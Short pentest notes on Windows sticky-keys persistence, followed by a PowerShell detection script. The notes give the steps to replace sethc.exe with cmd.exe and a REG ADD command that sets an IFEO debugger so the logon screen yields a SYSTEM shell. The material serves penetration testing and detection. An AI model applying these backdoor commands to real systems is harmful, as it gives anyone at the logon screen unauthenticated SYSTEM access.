02-Persistence, 02-Kiosk Break Out
Copying sethc.exe
Once you already have administrative access, you can install sticky keys-based persistence by performing the following:
- Make a backup copy of the original sethc.exe
- Copy cmd.exe to C:\Windows\System32\sethc.exe
- Reboot and hit Shift 5 times!
Registry Key
Another method is to set an Image File Execution Options (IFEO) debugger for sethc.exe, so that Windows launches cmd.exe in its place, by running the following command:

```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
```
- If you use sticky keys for persistence, any user at the logon screen can hit Shift five times and get a command prompt running as SYSTEM. BE CAREFUL!!! You shouldn’t introduce risks to your clients.
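A defensive check for both variants described above (the replaced binary and the IFEO Debugger value), added here as an example and not part of the original notes. It uses only built-in cmdlets and assumes the default %SystemRoot% paths and that the genuine sethc.exe names itself `sethc.exe` in its PE version resource.

```powershell
# Added example: detect the two sticky-keys persistence variants described above.
# Run in an elevated PowerShell session; uses only built-in cmdlets.
$sethc = Join-Path $env:SystemRoot 'System32\sethc.exe'
$cmd   = Join-Path $env:SystemRoot 'System32\cmd.exe'
$ifeo  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

$findings = @()

# Variant 1: sethc.exe overwritten with a copy of cmd.exe.
if (Test-Path $sethc) {
    $sethcHash = (Get-FileHash -Algorithm SHA256 -Path $sethc).Hash
    $cmdHash   = (Get-FileHash -Algorithm SHA256 -Path $cmd).Hash
    if ($sethcHash -eq $cmdHash) {
        $findings += "sethc.exe is byte-identical to cmd.exe (SHA256 $sethcHash)"
    }

    # The PE version resource of a copied binary still names its real origin
    # (cmd.exe reports 'Cmd.Exe'), so a mismatch also catches replacements other
    # than cmd.exe. Assumption: the genuine file reports 'sethc.exe' here.
    $orig = (Get-Item $sethc).VersionInfo.OriginalFilename
    if ($orig -and $orig -notmatch '^sethc\.exe$') {
        $findings += "sethc.exe reports OriginalFilename '$orig'"
    }
} else {
    $findings += 'sethc.exe is missing from System32'
}

# Variant 2: an IFEO Debugger value makes Windows launch the 'debugger' instead
# of sethc.exe, so any non-empty value here is suspicious.
if (Test-Path $ifeo) {
    $dbg = (Get-ItemProperty -Path $ifeo -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        $findings += "IFEO Debugger for sethc.exe is set to '$dbg'"
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'No sticky-keys persistence indicators found.'
} else {
    $findings | ForEach-Object { Write-Warning $_ }
    Write-Output 'Remediation: delete the IFEO key for sethc.exe and restore the binary with sfc /scannow.'
}
```

Because the same indicators (a sethc.exe hash equal to cmd.exe, or any IFEO Debugger value under sethc.exe) are visible remotely, the same logic ports directly to an EDR or configuration-baseline query across a fleet.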